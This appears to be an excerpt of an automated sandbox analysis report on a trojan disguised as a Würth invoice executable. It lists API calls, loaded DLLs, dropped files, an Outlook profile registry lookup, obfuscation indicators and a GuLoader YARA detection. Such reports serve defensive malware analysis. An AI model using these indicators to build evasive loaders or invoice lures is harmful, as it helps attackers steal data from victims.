Source: C:\Users\user\Desktop\Wuerth_factura_4052073226..exe	Code function: 4_2_3A691828	4_2_3A691828
Source: C:\Users\user\Desktop\Wuerth_factura_4052073226..exe	Code function: 4_2_3A69B030	4_2_3A69B030
Source: C:\Users\user\Desktop\Wuerth_factura_4052073226..exe	Code function: 4_2_3A69E230	4_2_3A69E230
Source: C:\Users\user\Desktop\Wuerth_factura_4052073226..exe	Code function: 4_2_3A690006	4_2_3A690006
Source: C:\Users\user\Desktop\Wuerth_factura_4052073226..exe	Code function: 4_2_3A69C610	4_2_3A69C610
Source: C:\Users\user\Desktop\Wuerth_factura_4052073226..exe	Code function: 4_2_3A699410	4_2_3A699410
Source: C:\Users\user\Desktop\Wuerth_factura_4052073226..exe	Code function: 4_2_3A69F810	4_2_3A69F810
Source: C:\Users\user\Desktop\Wuerth_factura_4052073226..exe	Code function: 4_2_3A691817	4_2_3A691817
Source: C:\Users\user\Desktop\Wuerth_factura_4052073226..exe	Code function: 4_2_3A691CE0	4_2_3A691CE0
Source: C:\Users\user\Desktop\Wuerth_factura_4052073226..exe	Code function: 4_2_3A6904F9	4_2_3A6904F9
Source: C:\Users\user\Desktop\Wuerth_factura_4052073226..exe	Code function: 4_2_3A69F4F0	4_2_3A69F4F0
Source: C:\Users\user\Desktop\Wuerth_factura_4052073226..exe	Code function: 4_2_3A6990F0	4_2_3A6990F0
Source: C:\Users\user\Desktop\Wuerth_factura_4052073226..exe	Code function: 4_2_3A69C2F0	4_2_3A69C2F0
Source: C:\Users\user\Desktop\Wuerth_factura_4052073226..exe	Code function: 4_2_3A69D8D0	4_2_3A69D8D0
Source: C:\Users\user\Desktop\Wuerth_factura_4052073226..exe	Code function: 4_2_3A69A6D0	4_2_3A69A6D0
Source: C:\Users\user\Desktop\Wuerth_factura_4052073226..exe	Code function: 4_2_3A69BCB0	4_2_3A69BCB0
Source: C:\Users\user\Desktop\Wuerth_factura_4052073226..exe	Code function: 4_2_3A698AB0	4_2_3A698AB0
Source: C:\Users\user\Desktop\Wuerth_factura_4052073226..exe	Code function: 4_2_3A69EEB0	4_2_3A69EEB0
Source: C:\Users\user\Desktop\Wuerth_factura_4052073226..exe	Code function: 4_2_3A690E8A	4_2_3A690E8A
Source: C:\Users\user\Desktop\Wuerth_factura_4052073226..exe	Code function: 4_2_3A690E98	4_2_3A690E98
Source: C:\Users\user\Desktop\Wuerth_factura_4052073226..exe	Code function: 4_2_3A69A090	4_2_3A69A090
Source: C:\Users\user\Desktop\Wuerth_factura_4052073226..exe	Code function: 4_2_3A69D290	4_2_3A69D290
Source: C:\Users\user\Desktop\Wuerth_factura_4052073226..exe	Code function: 4_2_3A691360	4_2_3A691360
Source: C:\Users\user\Desktop\Wuerth_factura_4052073226..exe	Code function: 4_2_3A693360	4_2_3A693360
Source: C:\Users\user\Desktop\Wuerth_factura_4052073226..exe	Code function: 4_2_3A699D70	4_2_3A699D70
Source: C:\Users\user\Desktop\Wuerth_factura_4052073226..exe	Code function: 4_2_3A69CF70	4_2_3A69CF70
Source: C:\Users\user\Desktop\Wuerth_factura_4052073226..exe	Code function: 4_2_3A691351	4_2_3A691351
Source: C:\Users\user\Desktop\Wuerth_factura_4052073226..exe	Code function: 4_2_3A69E550	4_2_3A69E550
Source: C:\Users\user\Desktop\Wuerth_factura_4052073226..exe	Code function: 4_2_3A69B350	4_2_3A69B350
Source: C:\Users\user\Desktop\Wuerth_factura_4052073226..exe	Code function: 4_2_3A69C930	4_2_3A69C930
Source: C:\Users\user\Desktop\Wuerth_factura_4052073226..exe	Code function: 4_2_3A699730	4_2_3A699730
Source: C:\Users\user\Desktop\Wuerth_factura_4052073226..exe	Code function: 4_2_3A690508	4_2_3A690508
Source: C:\Users\user\Desktop\Wuerth_factura_4052073226..exe	Code function: 4_2_3A69AD10	4_2_3A69AD10
Source: C:\Users\user\Desktop\Wuerth_factura_4052073226..exe	Code function: 4_2_3A69DF10	4_2_3A69DF10
Source: C:\Users\user\Desktop\Wuerth_factura_4052073226..exe	Code function: 4_2_3A69DBF0	4_2_3A69DBF0
Source: C:\Users\user\Desktop\Wuerth_factura_4052073226..exe	Code function: 4_2_3A69A9F0	4_2_3A69A9F0
Source: C:\Users\user\Desktop\Wuerth_factura_4052073226..exe	Code function: 4_2_3A69F1D0	4_2_3A69F1D0
Source: C:\Users\user\Desktop\Wuerth_factura_4052073226..exe	Code function: 4_2_3A6909D0	4_2_3A6909D0
Source: C:\Users\user\Desktop\Wuerth_factura_4052073226..exe	Code function: 4_2_3A698DD0	4_2_3A698DD0
Source: C:\Users\user\Desktop\Wuerth_factura_4052073226..exe	Code function: 4_2_3A69BFD0	4_2_3A69BFD0
Source: C:\Users\user\Desktop\Wuerth_factura_4052073226..exe	Code function: 4_2_3A6909BF	4_2_3A6909BF
Source: C:\Users\user\Desktop\Wuerth_factura_4052073226..exe	Code function: 4_2_3A69D5B0	4_2_3A69D5B0
Source: C:\Users\user\Desktop\Wuerth_factura_4052073226..exe	Code function: 4_2_3A69A3B0	4_2_3A69A3B0
Source: C:\Users\user\Desktop\Wuerth_factura_4052073226..exe	Code function: 4_2_3A69B990	4_2_3A69B990
Source: C:\Users\user\Desktop\Wuerth_factura_4052073226..exe	Code function: 4_2_3A698790	4_2_3A698790
Source: C:\Users\user\Desktop\Wuerth_factura_4052073226..exe	Code function: 4_2_3A69EB90	4_2_3A69EB90
Source: C:\Users\user\Desktop\Wuerth_factura_4052073226..exe	Code function: 4_2_3A811B50	4_2_3A811B50
Source: C:\Users\user\Desktop\Wuerth_factura_4052073226..exe	Code function: 4_2_3A813008	4_2_3A813008
Source: C:\Users\user\Desktop\Wuerth_factura_4052073226..exe	Code function: 4_2_3A8136F0	4_2_3A8136F0
Source: C:\Users\user\Desktop\Wuerth_factura_4052073226..exe	Code function: 4_2_3A811470	4_2_3A811470
Source: C:\Users\user\Desktop\Wuerth_factura_4052073226..exe	Code function: 4_2_3A812920	4_2_3A812920
Source: C:\Users\user\Desktop\Wuerth_factura_4052073226..exe	Code function: 4_2_3A810D88	4_2_3A810D88
Source: C:\Users\user\Desktop\Wuerth_factura_4052073226..exe	Code function: 4_2_3A812238	4_2_3A812238
Source: C:\Users\user\Desktop\Wuerth_factura_4052073226..exe	Code function: 4_2_3A811B3F	4_2_3A811B3F
Source: C:\Users\user\Desktop\Wuerth_factura_4052073226..exe	Code function: 4_2_3A8136E1	4_2_3A8136E1
Source: C:\Users\user\Desktop\Wuerth_factura_4052073226..exe	Code function: 4_2_3A811460	4_2_3A811460
Source: C:\Users\user\Desktop\Wuerth_factura_4052073226..exe	Code function: 4_2_3A810A10	4_2_3A810A10
Source: C:\Users\user\Desktop\Wuerth_factura_4052073226..exe	Code function: 4_2_3A8108DE	4_2_3A8108DE
Source: C:\Users\user\Desktop\Wuerth_factura_4052073226..exe	Code function: 4_2_3A812911	4_2_3A812911
Source: C:\Users\user\Desktop\Wuerth_factura_4052073226..exe	Code function: 4_2_3A810960	4_2_3A810960
Source: C:\Users\user\Desktop\Wuerth_factura_4052073226..exe	Code function: 4_2_3A812FFA	4_2_3A812FFA
Source: C:\Users\user\Desktop\Wuerth_factura_4052073226..exe	Code function: 4_2_3A810D7A	4_2_3A810D7A
Source: C:\Users\user\Desktop\Wuerth_factura_4052073226..exe	Code function: 4_2_3A812229	4_2_3A812229
Source: C:\Users\user\Desktop\Wuerth_factura_4052073226..exe	Code function: 4_2_3A810007	4_2_3A810007
Source: C:\Users\user\Desktop\Wuerth_factura_4052073226..exe	Code function: 4_2_3A810040	4_2_3A810040
Source: C:\Users\user\Desktop\Wuerth_factura_4052073226..exe	Code function: 4_2_3A9038D0	4_2_3A9038D0
Source: C:\Users\user\Desktop\Wuerth_factura_4052073226..exe	Code function: 4_2_3A901A20	4_2_3A901A20
Source: C:\Users\user\Desktop\Wuerth_factura_4052073226..exe	Code function: 4_2_3A909130	4_2_3A909130
Source: C:\Users\user\Desktop\Wuerth_factura_4052073226..exe	Code function: 4_2_3A902638	4_2_3A902638

Found potential string decryption / allocating functions

Source: C:\Users\user\Desktop\Wuerth_factura_4052073226..exe

Code function: String function: 00402BBF appears 51 times

Sample file is different than original file name gathered from version info

Source: Wuerth_factura_4052073226..exe, 00000004.00000002.3277055717.0000000006EB2000.00000004.00000020.00020000.00000000.sdmp	Binary or memory string: OriginalFilenameclr.dllT vs Wuerth_factura_4052073226..exe
Source: Wuerth_factura_4052073226..exe, 00000004.00000002.3296370437.0000000037207000.00000004.00000010.00020000.00000000.sdmp	Binary or memory string: OriginalFilenameUNKNOWN_FILET vs Wuerth_factura_4052073226..exe

Uses 32bit PE files

Source: Wuerth_factura_4052073226..exe

Static PE information: RELOCS_STRIPPED, EXECUTABLE_IMAGE, LINE_NUMS_STRIPPED, LOCAL_SYMS_STRIPPED, 32BIT_MACHINE

Source: classification engine

Classification label: mal100.troj.spyw.evad.winEXE@3/6@5/5

Source: C:\Users\user\Desktop\Wuerth_factura_4052073226..exe	Code function: 0_2_0040327D EntryPoint,SetErrorMode,GetVersion,lstrlenA,#17,OleInitialize,SHGetFileInfoW,GetCommandLineW,GetModuleHandleW,CharNextW,GetTempPathW,GetTempPathW,GetWindowsDirectoryW,lstrcatW,GetTempPathW,lstrcatW,SetEnvironmentVariableW,SetEnvironmentVariableW,SetEnvironmentVariableW,DeleteFileW,OleUninitialize,ExitProcess,lstrcatW,lstrcatW,lstrcatW,lstrcmpiW,SetCurrentDirectoryW,DeleteFileW,CopyFileW,CloseHandle,GetCurrentProcess,OpenProcessToken,LookupPrivilegeValueW,AdjustTokenPrivileges,ExitWindowsEx,ExitProcess,		0_2_0040327D
Source: C:\Users\user\Desktop\Wuerth_factura_4052073226..exe	Code function: 4_2_004032B2 lstrlenA,#17,OleInitialize,SHGetFileInfoW,GetCommandLineW,GetModuleHandleW,CharNextW,GetTempPathW,GetTempPathW,GetWindowsDirectoryW,lstrcatW,GetTempPathW,lstrcatW,SetEnvironmentVariableW,SetEnvironmentVariableW,SetEnvironmentVariableW,DeleteFileW,OleUninitialize,ExitProcess,lstrcatW,lstrcatW,lstrcatW,lstrcmpiW,SetCurrentDirectoryW,DeleteFileW,CopyFileW,CloseHandle,GetCurrentProcess,OpenProcessToken,LookupPrivilegeValueW,AdjustTokenPrivileges,ExitWindowsEx,ExitProcess,		4_2_004032B2

Source: C:\Users\user\Desktop\Wuerth_factura_4052073226..exe

Code function: 0_2_0040458C GetDlgItem,SetWindowTextW,SHBrowseForFolderW,CoTaskMemFree,lstrcmpiW,lstrcatW,SetDlgItemTextW,GetDiskFreeSpaceW,MulDiv,SetDlgItemTextW,

0_2_0040458C

Source: C:\Users\user\Desktop\Wuerth_factura_4052073226..exe

Code function: 0_2_00402095 CoCreateInstance,

0_2_00402095

Source: C:\Users\user\Desktop\Wuerth_factura_4052073226..exe

File created: C:\Users\user\Sympodia

Jump to behavior

Source: C:\Users\user\Desktop\Wuerth_factura_4052073226..exe

Mutant created: NULL

Source: C:\Users\user\Desktop\Wuerth_factura_4052073226..exe

File created: C:\Users\user\AppData\Local\Temp\nsp5FF1.tmp

Jump to behavior

Source: Wuerth_factura_4052073226..exe

Static PE information: Section: .text IMAGE_SCN_CNT_CODE, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ

Source: C:\Users\user\Desktop\Wuerth_factura_4052073226..exe

File read: C:\Users\desktop.ini

Jump to behavior

Source: C:\Users\user\Desktop\Wuerth_factura_4052073226..exe

Key opened: HKEY_CURRENT_USER\Software\Policies\Microsoft\Windows\Safer\CodeIdentifiers

Jump to behavior

Source: Wuerth_factura_4052073226..exe

ReversingLabs: Detection: 52%

Source: C:\Users\user\Desktop\Wuerth_factura_4052073226..exe

File read: C:\Users\user\Desktop\Wuerth_factura_4052073226..exe

Jump to behavior

Source: unknown	Process created: C:\Users\user\Desktop\Wuerth_factura_4052073226..exe "C:\Users\user\Desktop\Wuerth_factura_4052073226..exe"
Source: C:\Users\user\Desktop\Wuerth_factura_4052073226..exe	Process created: C:\Users\user\Desktop\Wuerth_factura_4052073226..exe "C:\Users\user\Desktop\Wuerth_factura_4052073226..exe"
Source: C:\Users\user\Desktop\Wuerth_factura_4052073226..exe	Process created: C:\Users\user\Desktop\Wuerth_factura_4052073226..exe "C:\Users\user\Desktop\Wuerth_factura_4052073226..exe"	Jump to behavior

Source: C:\Users\user\Desktop\Wuerth_factura_4052073226..exe	Section loaded: uxtheme.dll	Jump to behavior
Source: C:\Users\user\Desktop\Wuerth_factura_4052073226..exe	Section loaded: userenv.dll	Jump to behavior
Source: C:\Users\user\Desktop\Wuerth_factura_4052073226..exe	Section loaded: apphelp.dll	Jump to behavior
Source: C:\Users\user\Desktop\Wuerth_factura_4052073226..exe	Section loaded: propsys.dll	Jump to behavior
Source: C:\Users\user\Desktop\Wuerth_factura_4052073226..exe	Section loaded: dwmapi.dll	Jump to behavior
Source: C:\Users\user\Desktop\Wuerth_factura_4052073226..exe	Section loaded: cryptbase.dll	Jump to behavior
Source: C:\Users\user\Desktop\Wuerth_factura_4052073226..exe	Section loaded: oleacc.dll	Jump to behavior
Source: C:\Users\user\Desktop\Wuerth_factura_4052073226..exe	Section loaded: version.dll	Jump to behavior
Source: C:\Users\user\Desktop\Wuerth_factura_4052073226..exe	Section loaded: shfolder.dll	Jump to behavior
Source: C:\Users\user\Desktop\Wuerth_factura_4052073226..exe	Section loaded: kernel.appcore.dll	Jump to behavior
Source: C:\Users\user\Desktop\Wuerth_factura_4052073226..exe	Section loaded: windows.storage.dll	Jump to behavior
Source: C:\Users\user\Desktop\Wuerth_factura_4052073226..exe	Section loaded: wldp.dll	Jump to behavior
Source: C:\Users\user\Desktop\Wuerth_factura_4052073226..exe	Section loaded: profapi.dll	Jump to behavior
Source: C:\Users\user\Desktop\Wuerth_factura_4052073226..exe	Section loaded: riched20.dll	Jump to behavior
Source: C:\Users\user\Desktop\Wuerth_factura_4052073226..exe	Section loaded: usp10.dll	Jump to behavior
Source: C:\Users\user\Desktop\Wuerth_factura_4052073226..exe	Section loaded: msls31.dll	Jump to behavior
Source: C:\Users\user\Desktop\Wuerth_factura_4052073226..exe	Section loaded: textinputframework.dll	Jump to behavior
Source: C:\Users\user\Desktop\Wuerth_factura_4052073226..exe	Section loaded: coreuicomponents.dll	Jump to behavior
Source: C:\Users\user\Desktop\Wuerth_factura_4052073226..exe	Section loaded: coremessaging.dll	Jump to behavior
Source: C:\Users\user\Desktop\Wuerth_factura_4052073226..exe	Section loaded: ntmarta.dll	Jump to behavior
Source: C:\Users\user\Desktop\Wuerth_factura_4052073226..exe	Section loaded: coremessaging.dll	Jump to behavior
Source: C:\Users\user\Desktop\Wuerth_factura_4052073226..exe	Section loaded: wintypes.dll	Jump to behavior
Source: C:\Users\user\Desktop\Wuerth_factura_4052073226..exe	Section loaded: wintypes.dll	Jump to behavior
Source: C:\Users\user\Desktop\Wuerth_factura_4052073226..exe	Section loaded: wintypes.dll	Jump to behavior
Source: C:\Users\user\Desktop\Wuerth_factura_4052073226..exe	Section loaded: textshaping.dll	Jump to behavior
Source: C:\Users\user\Desktop\Wuerth_factura_4052073226..exe	Section loaded: wininet.dll	Jump to behavior
Source: C:\Users\user\Desktop\Wuerth_factura_4052073226..exe	Section loaded: iertutil.dll	Jump to behavior
Source: C:\Users\user\Desktop\Wuerth_factura_4052073226..exe	Section loaded: sspicli.dll	Jump to behavior
Source: C:\Users\user\Desktop\Wuerth_factura_4052073226..exe	Section loaded: windows.storage.dll	Jump to behavior
Source: C:\Users\user\Desktop\Wuerth_factura_4052073226..exe	Section loaded: wldp.dll	Jump to behavior
Source: C:\Users\user\Desktop\Wuerth_factura_4052073226..exe	Section loaded: profapi.dll	Jump to behavior
Source: C:\Users\user\Desktop\Wuerth_factura_4052073226..exe	Section loaded: kernel.appcore.dll	Jump to behavior
Source: C:\Users\user\Desktop\Wuerth_factura_4052073226..exe	Section loaded: ondemandconnroutehelper.dll	Jump to behavior
Source: C:\Users\user\Desktop\Wuerth_factura_4052073226..exe	Section loaded: winhttp.dll	Jump to behavior
Source: C:\Users\user\Desktop\Wuerth_factura_4052073226..exe	Section loaded: mswsock.dll	Jump to behavior
Source: C:\Users\user\Desktop\Wuerth_factura_4052073226..exe	Section loaded: iphlpapi.dll	Jump to behavior
Source: C:\Users\user\Desktop\Wuerth_factura_4052073226..exe	Section loaded: winnsi.dll	Jump to behavior
Source: C:\Users\user\Desktop\Wuerth_factura_4052073226..exe	Section loaded: urlmon.dll	Jump to behavior
Source: C:\Users\user\Desktop\Wuerth_factura_4052073226..exe	Section loaded: srvcli.dll	Jump to behavior
Source: C:\Users\user\Desktop\Wuerth_factura_4052073226..exe	Section loaded: netutils.dll	Jump to behavior
Source: C:\Users\user\Desktop\Wuerth_factura_4052073226..exe	Section loaded: dnsapi.dll	Jump to behavior
Source: C:\Users\user\Desktop\Wuerth_factura_4052073226..exe	Section loaded: rasadhlp.dll	Jump to behavior
Source: C:\Users\user\Desktop\Wuerth_factura_4052073226..exe	Section loaded: fwpuclnt.dll	Jump to behavior
Source: C:\Users\user\Desktop\Wuerth_factura_4052073226..exe	Section loaded: schannel.dll	Jump to behavior
Source: C:\Users\user\Desktop\Wuerth_factura_4052073226..exe	Section loaded: mskeyprotect.dll	Jump to behavior
Source: C:\Users\user\Desktop\Wuerth_factura_4052073226..exe	Section loaded: ntasn1.dll	Jump to behavior
Source: C:\Users\user\Desktop\Wuerth_factura_4052073226..exe	Section loaded: msasn1.dll	Jump to behavior
Source: C:\Users\user\Desktop\Wuerth_factura_4052073226..exe	Section loaded: dpapi.dll	Jump to behavior
Source: C:\Users\user\Desktop\Wuerth_factura_4052073226..exe	Section loaded: cryptsp.dll	Jump to behavior
Source: C:\Users\user\Desktop\Wuerth_factura_4052073226..exe	Section loaded: rsaenh.dll	Jump to behavior
Source: C:\Users\user\Desktop\Wuerth_factura_4052073226..exe	Section loaded: cryptbase.dll	Jump to behavior
Source: C:\Users\user\Desktop\Wuerth_factura_4052073226..exe	Section loaded: gpapi.dll	Jump to behavior
Source: C:\Users\user\Desktop\Wuerth_factura_4052073226..exe	Section loaded: ncrypt.dll	Jump to behavior
Source: C:\Users\user\Desktop\Wuerth_factura_4052073226..exe	Section loaded: ncryptsslp.dll	Jump to behavior
Source: C:\Users\user\Desktop\Wuerth_factura_4052073226..exe	Section loaded: mscoree.dll	Jump to behavior
Source: C:\Users\user\Desktop\Wuerth_factura_4052073226..exe	Section loaded: version.dll	Jump to behavior
Source: C:\Users\user\Desktop\Wuerth_factura_4052073226..exe	Section loaded: vcruntime140_clr0400.dll	Jump to behavior
Source: C:\Users\user\Desktop\Wuerth_factura_4052073226..exe	Section loaded: ucrtbase_clr0400.dll	Jump to behavior
Source: C:\Users\user\Desktop\Wuerth_factura_4052073226..exe	Section loaded: uxtheme.dll	Jump to behavior
Source: C:\Users\user\Desktop\Wuerth_factura_4052073226..exe	Section loaded: rasapi32.dll	Jump to behavior
Source: C:\Users\user\Desktop\Wuerth_factura_4052073226..exe	Section loaded: rasman.dll	Jump to behavior
Source: C:\Users\user\Desktop\Wuerth_factura_4052073226..exe	Section loaded: rtutils.dll	Jump to behavior
Source: C:\Users\user\Desktop\Wuerth_factura_4052073226..exe	Section loaded: dhcpcsvc6.dll	Jump to behavior
Source: C:\Users\user\Desktop\Wuerth_factura_4052073226..exe	Section loaded: dhcpcsvc.dll	Jump to behavior
Source: C:\Users\user\Desktop\Wuerth_factura_4052073226..exe	Section loaded: secur32.dll	Jump to behavior

Source: C:\Users\user\Desktop\Wuerth_factura_4052073226..exe

Key value queried: HKEY_LOCAL_MACHINE\SOFTWARE\Classes\WOW6432Node\CLSID\{1f486a52-3cb1-48fd-8f50-b8dc300d9f9d}\InProcServer32

Jump to behavior

Source: C:\Users\user\Desktop\Wuerth_factura_4052073226..exe

Key opened: HKEY_CURRENT_USER\Software\Microsoft\Office\15.0\Outlook\Profiles\Outlook\9375CFF0413111d3B88A00104B2A6676

Jump to behavior

Source: Wuerth_factura_4052073226..exe

Static file information: File size 1085283 > 1048576

Source: Wuerth_factura_4052073226..exe

Static PE information: DYNAMIC_BASE, NX_COMPAT, NO_SEH, TERMINAL_SERVER_AWARE

Data Obfuscation

Yara detected GuLoader

Source: Yara match	File source: 00000000.00000002.2534956936.0000000005BC2000.00000040.00001000.00020000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 00000004.00000002.3272331155.0000000002F22000.00000040.00000400.00020000.00000000.sdmp, type: MEMORY

Contains functionality to dynamically determine API calls

Source: C:\Users\user\Desktop\Wuerth_factura_4052073226..exe

Code function: 0_2_10001B18 GlobalAlloc,lstrcpyW,lstrcpyW,GlobalFree,GlobalFree,GlobalFree,GlobalFree,GlobalFree,GlobalFree,lstrcpyW,GetModuleHandleW,LoadLibraryW,GetProcAddress,lstrlenW,

0_2_10001B18

Uses code obfuscation techniques (call, push, ret)

Source: C:\Users\user\Desktop\Wuerth_factura_4052073226..exe	Code function: 0_2_10002DE0 push eax; ret	0_2_10002E0E
Source: C:\Users\user\Desktop\Wuerth_factura_4052073226..exe	Code function: 4_2_000D9C30 push esp; retf 0018h	4_2_000D9D55
Source: C:\Users\user\Desktop\Wuerth_factura_4052073226..exe	Code function: 4_2_000D48F8 push eax; ret	4_2_000D4912
Source: C:\Users\user\Desktop\Wuerth_factura_4052073226..exe	Code function: 4_2_000D4928 push eax; ret	4_2_000D4912
Source: C:\Users\user\Desktop\Wuerth_factura_4052073226..exe	Code function: 4_2_000D4928 push eax; ret	4_2_000D4922
Source: C:\Users\user\Desktop\Wuerth_factura_4052073226..exe	Code function: 4_2_000D4928 push eax; ret	4_2_000D4962
Source: C:\Users\user\Desktop\Wuerth_factura_4052073226..exe	Code function: 4_2_000D4968 push eax; ret	4_2_000D4972
Source: C:\Users\user\Desktop\Wuerth_factura_4052073226..exe	Code function: 4_2_000D4978 push eax; ret	4_2_000D4982
Source: C:\Users\user\Desktop\Wuerth_factura_4052073226..exe	Code function: 4_2_000D4988 push eax; ret	4_2_000D4992
Source: C:\Users\user\Desktop\Wuerth_factura_4052073226..exe	Code function: 4_2_000D4A2D push eax; ret	4_2_000D4962
Source: C:\Users\user\Desktop\Wuerth_factura_4052073226..exe	Code function: 4_2_39DB4FA3 push FFFFFFB6h; iretd	4_2_39DB4FA5
Source: C:\Users\user\Desktop\Wuerth_factura_4052073226..exe	Code function: 4_2_39DBC6A3 push 0000003Fh; iretd	4_2_39DBC6A5
Source: C:\Users\user\Desktop\Wuerth_factura_4052073226..exe	Code function: 4_2_3A9036B8 push es; retf	4_2_3A9036A7

Drops PE files

Source: C:\Users\user\Desktop\Wuerth_factura_4052073226..exe

File created: C:\Users\user\AppData\Local\Temp\nsf6188.tmp\System.dll

Jump to dropped file

Source: C:\Users\user\Desktop\Wuerth_factura_4052073226..exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\Wuerth_factura_4052073226..exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\Wuerth_factura_4052073226..exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\Wuerth_factura_4052073226..exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\Wuerth_factura_4052073226..exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\Wuerth_factura_4052073226..exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\Wuerth_factura_4052073226..exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\Wuerth_factura_4052073226..exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\Wuerth_factura_4052073226..exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\Wuerth_factura_4052073226..exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\Wuerth_factura_4052073226..exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\Wuerth_factura_4052073226..exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\Wuerth_factura_4052073226..exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\Wuerth_factura_4052073226..exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\Wuerth_factura_4052073226..exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\Wuerth_factura_4052073226..exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\Wuerth_factura_4052073226..exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\Wuerth_factura_4052073226..exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\Wuerth_factura_4052073226..exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\Wuerth_factura_4052073226..exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\Wuerth_factura_4052073226..exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\Wuerth_factura_4052073226..exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\Wuerth_factura_4052073226..exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\Wuerth_factura_4052073226..exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\Wuerth_factura_4052073226..exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\Wuerth_factura_4052073226..exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\Wuerth_factura_4052073226..exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\Wuerth_factura_4052073226..exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\Wuerth_factura_4052073226..exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\Wuerth_factura_4052073226..exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\Wuerth_factura_4052073226..exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\Wuerth_factura_4052073226..exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\Wuerth_factura_4052073226..exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\Wuerth_factura_4052073226..exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\Wuerth_factura_4052073226..exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\Wuerth_factura_4052073226..exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\Wuerth_factura_4052073226..exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\Wuerth_factura_4052073226..exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\Wuerth_factura_4052073226..exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\Wuerth_factura_4052073226..exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\Wuerth_factura_4052073226..exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\Wuerth_factura_4052073226..exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\Wuerth_factura_4052073226..exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\Wuerth_factura_4052073226..exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\Wuerth_factura_4052073226..exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\Wuerth_factura_4052073226..exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\Wuerth_factura_4052073226..exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\Wuerth_factura_4052073226..exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\Wuerth_factura_4052073226..exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\Wuerth_factura_4052073226..exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\Wuerth_factura_4052073226..exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\Wuerth_factura_4052073226..exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\Wuerth_factura_4052073226..exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\Wuerth_factura_4052073226..exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\Wuerth_factura_4052073226..exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\Wuerth_factura_4052073226..exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\Wuerth_factura_4052073226..exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
